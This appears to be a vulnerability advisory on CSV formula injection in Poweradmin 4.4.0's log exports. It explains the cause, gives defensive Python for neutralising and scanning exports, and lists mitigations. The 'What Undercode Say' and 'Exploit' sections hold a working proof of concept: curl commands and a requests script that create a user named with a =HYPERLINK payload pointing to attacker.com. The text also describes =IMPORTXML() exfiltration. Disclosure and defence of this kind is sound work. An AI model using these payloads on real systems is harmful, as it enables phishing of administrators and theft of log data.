Intro
The vulnerability arises from unsafe handling of user-controlled data, specifically the `username` field, during CSV export. Poweradmin v4.4.0 writes log entries to CSV with `fputcsv()` and performs no sanitisation of the characters that spreadsheet applications interpret as formula triggers (`=`, `+`, `-`, `@`). When an administrator exports activity logs and opens the resulting CSV in Microsoft Excel, LibreOffice Calc or Google Sheets, a formula stored in a username is evaluated by the spreadsheet engine (subject only to whatever security prompt the application shows for the particular function used; `=HYPERLINK()` evaluates without one).
The issue exists in four log export controllers: `ListLogUsersController.php` (lines 188, 194), `ListLogZonesController.php`, `ListLogGroupsController.php` and `ListLogApiController.php`. In each, the `user` column (actor) and the `username` column (affected account) are written verbatim.
– A username such as `=1+1` is written without CSV enclosure quotes (it contains no delimiter, quote or line break), so the spreadsheet sees `=1+1` directly and treats it as a formula.
– A username containing commas or quotes (e.g. `=HYPERLINK("http://attacker.com","Click here")`) is enclosed in double quotes with the internal quotes doubled, which is `fputcsv()`'s default behaviour, but the spreadsheet strips that CSV quoting when it parses the file and still evaluates the cell as a formula because the decoded value begins with `=`.
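To make the two quoting cases above concrete, here is an added Python example (not Poweradmin code). It writes constructed log rows with Python's `csv` module, which for these inputs applies the same minimal quoting rule as PHP's `fputcsv()` (quote a field only when it contains the delimiter, a double quote or a line break, doubling embedded quotes), and then parses the file back the way a spreadsheet does. The column names and row data are constructed for the demonstration.

```python
import csv
import io

# Constructed sample rows in the shape of the exported log
# (timestamp, actor, affected username, event); not real Poweradmin data.
HEADER = ["timestamp", "user", "username", "event"]
SAMPLE_ROWS = [
    ["2024-01-01T10:00:00", "admin", "alice", "user_add"],
    ["2024-01-01T10:01:00", "admin", "=1+1", "user_add"],
    ["2024-01-01T10:02:00", "admin",
     '=HYPERLINK("http://attacker.com","Click here")', "user_add"],
]


def export_unsafe(rows):
    """Mimic the vulnerable controllers: fields are written verbatim with
    minimal quoting. A field is enclosed in double quotes only if it
    contains a comma, a double quote or a line break, and any embedded
    double quotes are doubled, exactly as fputcsv() does for these values."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_MINIMAL, lineterminator="\n")
    writer.writerow(HEADER)
    writer.writerows(rows)
    return buf.getvalue()


def decoded_usernames(csv_text):
    """Parse the export back as a spreadsheet does: enclosure quotes are
    removed and doubled quotes collapsed, so each cell is the original
    username again, whether or not it was quoted in the file. Any value
    that begins with '=' is therefore handed to the formula engine."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return [row["username"] for row in reader]


if __name__ == "__main__":
    text = export_unsafe(SAMPLE_ROWS)
    print(text)  # `=1+1` is bare; the HYPERLINK value is quoted with "" inside
    for username in decoded_usernames(text):
        print("cell value after CSV decoding:", username)
```

Running it prints the raw file, in which only the HYPERLINK row is quoted, followed by the decoded cells, both of which still start with `=`; that is why quoting alone is not a defence.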
Additionally, PHP deprecation warnings are emitted into the HTTP response body ahead of the CSV output, exposing internal file paths (e.g. `/app/lib/Application/Controller/ListLogUsersController.php`); this is a secondary information disclosure issue (CWE-209). When PHP is configured to display errors (`display_errors`), the warning text is prepended to the CSV body and corrupts the exported file.
An attacker with the ability to create user accounts (i.e. an account with `user_add_new` permission) can inject a malicious formula as a username. When the administrator later exports the log and opens the CSV, the formula executes. Attack scenarios include phishing (rendering a convincing hyperlink) and data exfiltration (using `=IMPORTXML()` or similar to send adjacent cell data to an attacker‑controlled server).
The vulnerability is confirmed on Poweradmin v4.4.0, including the Docker image poweradmin/poweradmin:latest. No CVE has been assigned to this specific issue at the time of writing.
DailyCVE Form
Platform: Poweradmin
Version: 4.4.0
Vulnerability: CSV Formula Injection
Severity: Medium
Date: Unknown
Prediction: Unknown
What Undercode Say
Create a malicious user with a formula payload (`admin_session_cookie` stands for a valid administrator session cookie; the `/admin/...` paths are as given in the original post):

```bash
curl -X POST \
  -d "username==HYPERLINK(\"http://attacker.com\",\"Confirm Identity\")&[email protected]&password=EvilPass123&role=user" \
  -b "admin_session_cookie" \
  http://target.poweradmin/admin/users/add
```

Export the CSV; the formula fires when the file is opened in a spreadsheet:

```bash
curl -b "admin_session_cookie" \
  http://target.poweradmin/admin/logs/export > malicious.csv
```

Python script to automate the attack:

```python
import requests

session = requests.Session()

# Authenticate as an account that holds the user_add_new permission.
session.post('http://target.poweradmin/login',
             data={'username': 'admin', 'password': 'admin123'})

# Create a user whose name is a spreadsheet formula; it is stored verbatim.
payload = '=HYPERLINK("http://attacker.com","Click here")'
session.post('http://target.poweradmin/admin/users/add',
             data={'username': payload, 'email': '[email protected]',
                   'password': 'EvilPass123'})

# Fetch the log export; the username is written to the CSV unsanitised.
response = session.get('http://target.poweradmin/admin/logs/export')
with open('poc.csv', 'wb') as f:
    f.write(response.content)

print("CSV file 'poc.csv' saved. Open it in Excel/LibreOffice to trigger payload.")
```
Exploit
1. Log in as an administrator (or any account with `user_add_new` permission).
2. Create a new user with the username:
   `=HYPERLINK("http://attacker.com","Confirm Identity")`
3. Log out and log in as that user to generate a log entry.
4. Log back in as administrator and navigate to `Users` → Logs.
5. Click Export CSV.
6. Open the downloaded CSV file in Microsoft Excel or LibreOffice Calc.
Result: The cell containing the username becomes a clickable hyperlink labelled "Confirm Identity". With a simpler payload such as `=1+1`, the cell displays 2, confirming formula execution.
Protection
- Input sanitisation: reject (or neutralise with a leading single quote) any username that begins with `=`, `+`, `-`, `@`, a tab or a carriage return. Validate at account creation, and neutralise again at export time so that accounts created before the check are covered.
- CSV quoting: wrapping every exported field in double quotes makes the file unambiguous to parse, but on its own it does not stop formula evaluation (the quoted `=HYPERLINK(...)` case in the Intro still fires); combine it with the neutralisation step.
- Spreadsheet-application hardening: disable automatic formula evaluation, or open exported files in "Protected View" or an equivalent read-only mode when they come from untrusted sources.
- Upgrade Poweradmin: apply any future patch that addresses CSV injection in the log export controllers.
- Least privilege: restrict the `user_add_new` permission to the administrators who actually need it.
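The following added Python example (not Poweradmin's code) shows the export-side fix from the first two bullets, a creation-time username check, and a check that can be run over exports that already exist. `neutralise()` prefixes a leading trigger character with a single quote, `export_safe()` applies it to every field and quotes all fields, and `scan_export()` flags cells in an existing CSV that a spreadsheet would evaluate. The username policy in `username_allowed()` is an assumption, and the sample rows and `UNSAFE_EXPORT` text are constructed to match the two cases in the Intro.

```python
import csv
import io

# Leading characters that Excel, LibreOffice Calc and Google Sheets treat
# as the start of a formula. Tab and carriage return are included as well,
# following the OWASP CSV-injection guidance.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed rows in the shape of the exported log (not real data).
HEADER = ["timestamp", "user", "username", "event"]
SAMPLE_ROWS = [
    ["2024-01-01T10:00:00", "admin", "alice", "user_add"],
    ["2024-01-01T10:01:00", "admin", "=1+1", "user_add"],
    ["2024-01-01T10:02:00", "admin",
     '=HYPERLINK("http://attacker.com","Click here")', "user_add"],
]

# Constructed text of what the vulnerable export produces for those rows.
UNSAFE_EXPORT = (
    "timestamp,user,username,event\n"
    "2024-01-01T10:00:00,admin,alice,user_add\n"
    "2024-01-01T10:01:00,admin,=1+1,user_add\n"
    '2024-01-01T10:02:00,admin,'
    '"=HYPERLINK(""http://attacker.com"",""Click here"")",user_add\n'
)


def username_allowed(username):
    """Creation-time check (assumed policy): non-empty, no leading formula
    trigger, and only letters, digits, '.', '_' and '-' anywhere."""
    if not username or username[0] in FORMULA_TRIGGERS:
        return False
    return all(c.isalnum() or c in "._-" for c in username)


def neutralise(value):
    """Export-time defence: prefix a leading trigger character with a single
    quote so the spreadsheet stores the cell as text. The quote is visible
    in the cell, but the formula is never evaluated."""
    if value and value[0] in FORMULA_TRIGGERS:
        return "'" + value
    return value


def export_safe(rows):
    """Hardened export: neutralise every field, then quote every field.
    Quoting alone is not a defence (see the Intro); it only makes the
    file unambiguous for parsers."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(HEADER)
    for row in rows:
        writer.writerow([neutralise(str(field)) for field in row])
    return buf.getvalue()


def scan_export(csv_text):
    """Check an existing export: return (row_number, column, value) for
    every decoded cell that a spreadsheet would evaluate as a formula.
    Row numbers count the header line as row 1."""
    reader = csv.reader(io.StringIO(csv_text))
    header = next(reader)
    findings = []
    for number, row in enumerate(reader, start=2):
        for column, cell in zip(header, row):
            if cell[:1] in FORMULA_TRIGGERS:
                findings.append((number, column, cell))
    return findings


if __name__ == "__main__":
    for finding in scan_export(UNSAFE_EXPORT):
        print("formula cell in unsafe export:", finding)
    hardened = export_safe(SAMPLE_ROWS)
    print(hardened)
    print("findings in hardened export:", scan_export(hardened))
```

Apply `neutralise()` to user-controlled text columns; numeric columns written as numbers do not need it, and a leading `-` there is a legitimate sign. `scan_export()` is also a reasonable one-off check against exports already sitting on administrators' machines.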
Impact
- Phishing: A malicious actor can craft a formula that renders as a convincing link in the exported report, tricking a higher‑privileged administrator into clicking it.
- Data exfiltration: Using `=IMPORTXML()` (Google Sheets) or similar functions, adjacent log data can be silently sent to an attacker‑controlled server when the sheet is opened.
- Reputation damage: If exploited successfully, the organisation’s internal logs may be compromised, leading to loss of trust.
- Compliance breach: Unauthorised data extraction may violate GDPR, HIPAA, or other regulatory frameworks.
Sources:
Reported By: github.com

